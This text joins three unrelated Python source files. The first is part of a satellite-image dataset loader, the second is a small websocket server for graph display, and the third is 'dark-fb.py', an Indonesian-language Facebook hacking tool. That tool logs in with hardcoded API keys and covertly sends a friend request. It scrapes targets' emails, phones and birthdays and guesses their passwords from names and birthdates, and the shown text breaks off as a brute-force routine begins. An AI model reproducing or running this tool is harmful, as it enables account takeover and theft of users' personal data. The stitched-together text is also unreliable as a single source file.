"Date from image {} not in date range".format(
tile_handlers[tile_name].s2_images[tuple_idx["t"]["s2"]])
tmp = {idx: {self.distribution[idx]["number"]: (tile_name, tuple_pos, tuple_idx)}}
self.distribution[idx]["number"] += 1
self.tuples_map = update(self.tuples_map, tmp)
self.nb_of_tuples += 1
self.keys = list(self.tuples_map.keys())
self.indices = dict()
for idx in self.distribution:
indices = {idx: np.arange(0, self.distribution[idx]["number"])}
self.indices.update(indices)
self.shuffle_indices(idx)
logging.info("Distribution: %s", self.indices)
def shuffle_indices(self, idx):
""" Shuffle the indices of the idx-th season """
np.random.shuffle(self.indices[idx])
def shuffle(self):
for idx in self.distribution:
self.shuffle_indices(idx)
def __next__(self):
"""
Provides a sequence of (tile_name, tuple_pos, tuple_indices)
"""
idx = int(np.random.randint(len(self.keys)))
pos = self.keys[idx]
current_index = self.indices[pos][self.distribution[pos]["count"]]
ret = self.tuples_map[pos][current_index]
if self.distribution[pos]["count"] < self.distribution[pos]["number"] - 1:
self.distribution[pos]["count"] += 1
else:
self.shuffle_indices(pos)
self.distribution[pos]["count"] = 0
return ret
class LimitedIterator(OversamplingIterator):
"""
Iterator that ends after a fixed number of samples
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, nb_samples=1000):
super().__init__(acquisitions_layout, tile_handlers, tile_rois)
self.nb_of_tuples = nb_samples
# ------------------------------------------------- Dataset class ------------------------------------------------------
class Dataset:
"""
Handles the "mining" of the tile handlers.
This class runs a thread that extracts tuples from the tile handlers, while keeping already gathered tuples
available for reading.
"""
def __init__(self, acquisitions_layout, tile_handlers, tile_rois, buffer_length=128, iterator_class=RandomIterator,
max_nb_of_samples=None):
"""
:param acquisitions_layout: The acquisitions layout (instance of sensing_layout.AcquisitionsLayout)
:param tile_handlers: A dict() of tile_io.TileHandler instances. The keys of the dict() are the tile name.
:param tile_rois: A dict() of ROIs. The keys of the dict() are the tile name.
:param buffer_length: The number of samples that are stored in the buffer.
:param iterator_class: An iterator that provides a sequence of (tile_name, tuple_pos, tuple_indices)
:param max_nb_of_samples: Optional, maximum number of samples to read.
"""
# tile handlers
self.tile_handlers = tile_handlers
# iterator
self.iterator = iterator_class(acquisitions_layout, tile_handlers, tile_rois)
self.size = min(self.iterator.nb_of_tuples,
max_nb_of_samples) if max_nb_of_samples else self.iterator.nb_of_tuples
# Get patches sizes and type, of the first sample of the first tile
self.output_types = dict()
self.output_shapes = dict()
# Read the first available sample, then break out of all the loops
for tile_name, tile_tuples_grid in self.iterator.tuples_grids.items():
for tuple_pos, tuple_indices in tile_tuples_grid.items():
for indices in tuple_indices:
new_sample = self.tile_handlers[tile_name].read_tuple(tuple_pos=tuple_pos, tuple_indices=indices)
for key, np_arr in new_sample.items():
if isinstance(np_arr, (np.ndarray, np.generic)):
self.output_shapes[key] = np_arr.shape
self.output_types[key] = tf.dtypes.as_dtype(np_arr.dtype)
break
break
if self.output_shapes: # we break only if there was a sample, otherwise we continue to next tile
break
logging.info("output_types: %s", self.output_types)
logging.info("output_shapes: %s", self.output_shapes)
# buffers
self.miner_buffer = Buffer(buffer_length)
self.consumer_buffer = Buffer(buffer_length)
self.consumer_buffer_pos = 0
self.tot_wait = 0
self.miner_thread = self._summon_miner_thread()
self.read_lock = multiprocessing.Lock()
self._dump()
# Prepare tf dataset
self.tf_dataset = tf.data.Dataset.from_generator(self._generator,
output_signature={
name: tf.TensorSpec(shape=self.output_shapes[name],
dtype=self.output_types[name],
name=name) for name in
self.output_types}).repeat(1)
def read_one_sample(self):
"""
Read one element of the consumer_buffer
The lock prevents different threads from reading and updating the internal counter concurrently
"""
with self.read_lock:
output = None
if self.consumer_buffer_pos < self.consumer_buffer.max_length:
output = self.consumer_buffer.container[self.consumer_buffer_pos]
self.consumer_buffer_pos += 1
if self.consumer_buffer_pos == self.consumer_buffer.max_length:
self._dump()
self.consumer_buffer_pos = 0
return output
def _dump(self):
"""
This function dumps the miner_buffer into the consumer_buffer, and restarts the miner_thread
"""
# Wait for miner to finish his job
start_time = time.time()
self.miner_thread.join()
self.tot_wait += time.time() - start_time
# Copy miner_buffer.container --> consumer_buffer.container
self.consumer_buffer.container = self.miner_buffer.container.copy()
# Clear miner_buffer.container
self.miner_buffer.container.clear()
# Restart miner_thread
self.miner_thread = self._summon_miner_thread()
def _collect(self):
"""
This function collects samples.
It runs in the miner_thread.
"""
# Fill the miner_container until it's full
while not self.miner_buffer.is_complete():
try:
tile_name, tuple_pos, tuple_indices = next(self.iterator)
new_sample = self.tile_handlers[tile_name].read_tuple(tuple_pos=tuple_pos, tuple_indices=tuple_indices)
self.miner_buffer.add(new_sample)
except KeyboardInterrupt:
logging.info("Interrupted by user. Exiting.")
system.terminate()
def _summon_miner_thread(self):
"""
Creates and starts the thread for the data collection
"""
miner_thread = threading.Thread(target=self._collect)
miner_thread.start()
return miner_thread
def _generator(self):
"""
Generator function, used for the tf dataset
"""
for _ in range(self.size):
yield self.read_one_sample()
def get_tf_dataset(self, batch_size, drop_remainder=True):
"""
Returns a TF dataset, ready to be used with the provided batch size
:param batch_size: the batch size
:param drop_remainder: drop incomplete batches when True
:return: The TF dataset
"""
return self.tf_dataset.batch(batch_size, drop_remainder=drop_remainder)
def get_total_wait_in_seconds(self):
"""
Returns the number of seconds during which the data gathering was delayed due to I/O bottleneck
:return: duration in seconds
"""
return self.tot_wait
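# Typical usage sketch (illustrative; acquisitions_layout, tile_handlers and
# tile_rois are assumed to be built elsewhere in decloud):
#
#   dataset = Dataset(acquisitions_layout, tile_handlers, tile_rois,
#                     buffer_length=128, iterator_class=RandomIterator)
#   tf_ds = dataset.get_tf_dataset(batch_size=8)
#   for batch in tf_ds:
#       ...  # feed the training or TFRecord-export loop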
class RoisLoader(dict):
"""
A class that instantiates ROIs from a JSON file
Keys:
- "ROIS_ROOT_DIR": str
- "TRAIN_TILES": str
- "VALID_TILES": str
Example of a .json file:
{
"ROIS_ROOT_DIR": "/data/decloud/ROI",
"TRAIN_TILES":["T31TCK", "T31TDJ"],
"VALID_TILES":["T31TEJ", "T31TCJ", "T31TDH"]
}
"""
def __init__(self, the_json):
super().__init__()
logging.info("Loading rois from %s", the_json)
with open(the_json) as json_file:
data = json.load(json_file)
root_dir_key = "ROIS_ROOT_DIR"
assert root_dir_key in data
self.rois_root_dir = data[root_dir_key]
assert isinstance(self.rois_root_dir, str)
self.rois_root_dir = system.pathify(self.rois_root_dir)
def get_list(key):
"""
Retrieve a list of str
:param key: key
:return: list of str
"""
assert key in data
item = data[key]
assert isinstance(item, list)
return item
# Tiles list
self.train_tiles_list = get_list("TRAIN_TILES")
self.valid_tiles_list = get_list("VALID_TILES")
self.fill_dict(self.train_tiles_list, "train")
self.fill_dict(self.valid_tiles_list, "valid")
def fill_dict(self, tiles_list, suffix):
"""
Check that the ROI files exist and fill the dict
:param tiles_list: tile list
:param suffix: file suffix (e.g. "train")
"""
tiles = {}
for tile in tiles_list:
roi_file = "{}{}_{}.tif".format(self.rois_root_dir, tile, suffix)
assert system.file_exists(roi_file)
tiles.update({tile: roi_file})
self.update({"roi_{}".format(suffix): tiles})
|
connection.py
|
# NOTE: WebsocketServer (used below) is assumed to come from the third-party
# `websocket-server` package, whose set_fn_* / run_forever API this file relies on.
from websocket_server import WebsocketServer

graph_client_dict = {}
current_server = None
reloaded_graph = None
# Called for every client connecting
def new_client(client, server):
global reloaded_graph
if client['id'] not in graph_client_dict :
# If some other client has left (cf. client_left())
if reloaded_graph :
graph_client_dict[client['id']] = reloaded_graph
print("Page reloaded. New client id is %d" % client['id'])
else :
end_connection_client(client, server)
print("Client %d could not connect. Use show_CustomJS(graph)" % client['id'])
else :
print("New client connected and was given id %d" % client['id'])
reloaded_graph = None
# Called for every client disconnecting
def client_left(client, server):
global graph_client_dict,current_server, reloaded_graph
if client['id'] in graph_client_dict :
print("Client(%d) disconnected" % client['id'])
reloaded_graph = graph_client_dict.pop(client['id'])
# Wait half a second in case a new client appears while graph_client_dict is empty (page reload case)
import time
time.sleep(0.5)
if not graph_client_dict :
server.shutdown()
print("server closed")
current_server = None
import threading
def launch_connection():
t = threading.Thread(target=connect)
t.start()
def port_in_use(port: int) -> bool:
import socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
return s.connect_ex(('localhost', port)) == 0
def connect():
PORT=9001
# Variant using an if/else (kept for reference):
'''if (port_in_use(PORT) == 0) :
server = None
server = WebsocketServer(PORT)
server.set_fn_new_client(new_client)
server.set_fn_client_left(client_left)
server.set_fn_message_received(message_received)
global current_server
current_server = server
server.run_forever()
else :
print("Veuillez fermer ma page avant de lancer un nouveua graph")
'''
# Variant that raises an exception when the port is already in use
if port_in_use(PORT):
    raise Exception('The port is already in use; please close the page \n before launching a new Graph')
else :
server = None
server = WebsocketServer(PORT)
server.set_fn_new_client(new_client)
server.set_fn_client_left(client_left)
server.set_fn_message_received(message_received)
global current_server
current_server = server
server.run_forever()
from json import JSONEncoder
from time import gmtime, strftime
# Called when a client sends a message
def message_received(client, server, message):
global graph_client_dict, reload_in_process
if client['id'] in graph_client_dict :
print(strftime('[%H:%M:%S]', gmtime()))
targetGraph = graph_client_dict[client['id']]
JSONmessage = DataGraph(message)
# Reverse connection between Sage and JS
if JSONmessage.parameter == "renewGraph":
response, newGraph = handle_message(JSONmessage.parameter,targetGraph)
else:
newGraph = ConstructGraphFromJSONObject(JSONmessage)
response, newGraph = handle_message(JSONmessage.parameter,newGraph)
update_graph(targetGraph, newGraph)
if(JSONmessage.message != ""):
print(JSONmessage.message)
if response[1] != None :
returnMessage = JSONEncoder().encode({"request":response[0], "result": response[1]})
server.send_message(client,returnMessage)
else :
end_connection_client(client, server)
def handle_message(parameter,graph):
response = None
if parameter is not None:
response, graph = JS_functions_dict[parameter](graph)
return response, graph
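# Note: JS_functions_dict (defined elsewhere) is expected to map a parameter name
# to a callable taking the current graph and returning ((request, result), new_graph).
# A hypothetical entry could look like:
#
#   JS_functions_dict["vertexCount"] = lambda g: (("vertexCount", g.order()), g)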
def end_connection_client(client, server):
returnMessage = JSONEncoder().encode({"request":'closeConnection', "result": ''})
server.send_message(client,returnMessage)
def client_dictionnary_verification(G):
global current_server, graph_client_dict
if G in graph_client_dict.values() :
idGraph = id(G)
for key in graph_client_dict.keys() :
if id(graph_client_dict[key]) == idGraph :
client_to_remove = None
for client in current_server.clients:
if client['id'] == key :
end_connection_client(client, current_server)
|
dark-fb.py
|
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Keluar'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = '\x1b[1;92m\n\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80 \xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97 \n \xe2\x95\x91\xe2\x95\x91\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x9c\xe2\x94\xac\xe2\x94\x98\xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xa0\xe2\x95\xa3 \xe2\x95\xa0\xe2\x95\xa9\xe2\x95\x97\n\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\x9a \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \x1b[1;93mv1.7\n\x1b[1;93m* \x1b[1;97mRecode \x1b[1;91m: \x1b[1;96mMR @Joshua_Ir$A\x1b[1;97m\n\x1b[1;93m* \x1b[1;97mYouTube \x1b[1;91m: \x1b[1;96mVoltHz Official \x1b[1;97m[\x1b[1;96m\x1b[1;97m] \x1b[1;97m/ \x1b[1;96m& Spesial Thanks To MR.K7C8NG \x1b[1;97m/ \x1b[1;96mSubscribe\n\x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m\x1b[4mhttps://github.com/volthzofficial\x1b[0m\n[~] Dibawah lisensi \n'
print 'Gunakan Dengan Baik!!'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLogin \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mLogin Menggunakan Facebook \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[~] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[~] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://youtube.com/volthzofficial')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSilahkan login kembali'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Nama \x1b[1;91m: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m1. Informasi Pengguna'
print '\x1b[1;37;40m2. Hack Akun Facebook'
print '\x1b[1;37;40m3. Bot '
print '\x1b[1;37;40m4. Lainnya.... '
print '\x1b[1;37;40m5. Logout '
print '\x1b[1;31;40m0. Keluar '
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.youtube.com/volthzofficial')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Ambil id/email/hp'
print '\x1b[1;31;40m0. Kembali'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
